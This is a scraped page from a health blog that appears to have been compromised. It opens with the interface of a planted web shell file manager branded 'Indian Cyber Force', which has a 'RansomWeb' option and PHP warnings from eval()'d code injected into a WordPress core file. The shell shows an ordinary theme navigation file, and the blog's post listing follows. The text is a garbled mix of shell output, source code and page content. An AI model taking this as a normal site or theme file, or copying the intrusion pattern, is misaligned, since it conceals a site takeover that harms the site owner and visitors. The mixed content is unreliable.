Warning: Constant WP_USE_THEMES already defined in css.zip#index.php on line 74
  • Home (current)
  • वर्तमान निदेशक => /www/wwwroot/wellwisehub.org/wp-content/themes/graceful/inc/customizer/theme-options/
  • सूचना एवं अपलोड
    Info Server
Indian Cyber Force
Folders रचयन्तु सञ्चिकां रचयन्तु RansomWeb लॉगआउट

Warning: Undefined array key "बहिः गच्छतु" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 136

Warning: Undefined array key "aksi" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 140

Warning: Undefined array key "नामपत्र" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 159

Warning: Undefined array key "नामपत्र" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 181
Current File : /www/wwwroot/wellwisehub.org/wp-content/themes/graceful/inc/customizer/theme-options/navigation.php
<?php
/**
 * Customizer Navigation Panels
 *
 * @package Graceful
 */

	// add Main Navigation section
	$wp_customize->add_section( 'graceful_main_navigation' , array(
		'title'		 => esc_html__( 'Main Navigation', 'graceful' ),
		'priority'	 => 23,
		'capability' => 'edit_theme_options'
	) );

	// Main Navigation
	$wp_customize->add_setting( 'graceful_options[main_navigation_show]', array(
		'default'	 => graceful_options('main_navigation_show'),
		'type'		 => 'option',
		'transport'	 => 'refresh',
		'capability' => 'edit_theme_options',
		'sanitize_callback' => 'graceful_sanitize_checkboxes'
	) );
	$wp_customize->add_control( 'graceful_options[main_navigation_show]', array(
		'label'		=> esc_html__( 'Enable Main Navigation', 'graceful' ),
		'section'	=> 'graceful_main_navigation',
		'type'		=> 'checkbox',
		'priority'	=> 1
	) );


	// Align	
	$main_navigation_align = array(
		'left' => esc_html__( 'Left', 'graceful' ),
		'center' => esc_html__( 'Center', 'graceful' ),
		'right' => esc_html__( 'Right', 'graceful' ),
	);

	$wp_customize->add_setting( 'graceful_options[main_navigation_align]', array(
		'default'	 => graceful_options('main_navigation_align'),
		'type'		 => 'option',
		'transport'	 => 'refresh',
		'capability' => 'edit_theme_options',
		'sanitize_callback' => 'graceful_sanitize_select'
	) );
	$wp_customize->add_control( 'graceful_options[main_navigation_align]', array(
		'label'			=> esc_html__( 'Align', 'graceful' ),
		'section'		=> 'graceful_main_navigation',
		'type'			=> 'select',
		'choices' 		=> $main_navigation_align,
		'priority'		=> 7
	) );


	// Show Search Icon
	$wp_customize->add_setting( 'graceful_options[main_navigation_show_search]', array(
		'default'	 => graceful_options('main_navigation_show_search'),
		'type'		 => 'option',
		'transport'	 => 'refresh',
		'capability' => 'edit_theme_options',
		'sanitize_callback' => 'graceful_sanitize_checkboxes'
	) );
	$wp_customize->add_control( 'graceful_options[main_navigation_show_search]', array(
		'label'		=> esc_html__( 'Show Search Icon', 'graceful' ),
		'section'	=> 'graceful_main_navigation',
		'type'		=> 'checkbox',
		'priority'	=> 13
	) );


	// Show Sidebar Icon
	$wp_customize->add_setting( 'graceful_options[main_navigation_show_sidebar]', array(
		'default'	 => graceful_options('main_navigation_show_sidebar'),
		'type'		 => 'option',
		'transport'	 => 'refresh',
		'capability' => 'edit_theme_options',
		'sanitize_callback' => 'graceful_sanitize_checkboxes'
	) );
	$wp_customize->add_control( 'graceful_options[main_navigation_show_sidebar]', array(
		'label'		=> esc_html__( 'Show Sidebar Slide Menu', 'graceful' ),
		'section'	=> 'graceful_main_navigation',
		'type'		=> 'checkbox',
		'priority'	=> 15
	) );
wellwisehub – Page 11 Skip to content
wellwisehub

Latest Articles

  • Blog

    Understanding the Four Phases of Abuse and Breaking Free from the Cycle

  • Blog

    8 Ways Chiropractic Care Can Improve Your Health in Valdosta

  • Blog

    9 Advantages of Choosing CoolSculpting in Vancouver, British Columbia

  • Blog

    4 Essential Strategies for Selecting the Perfect Custom Orthotic Inserts

  • Blog

    Nourishing Foods for Optimal Urinary Tract Health: Your Guide to Better Nutrition

  • Blog

    The Impact of Stigma on PTSD Recovery

  • Blog

    5 Ways Weighted Blankets Boost Your Health and Well-Being

  • Blog

    The Link Between Hormones and Sleep: Understanding Their Relationship

  • Blog

    Intermittent Fasting: Who Is It Really For?

  • Blog

    How to Boost Productivity and Thrive in Your Daily Routine

 Older Posts
Newer Posts 

Recent Posts

Recent Comments

Graceful Theme by Optima Themes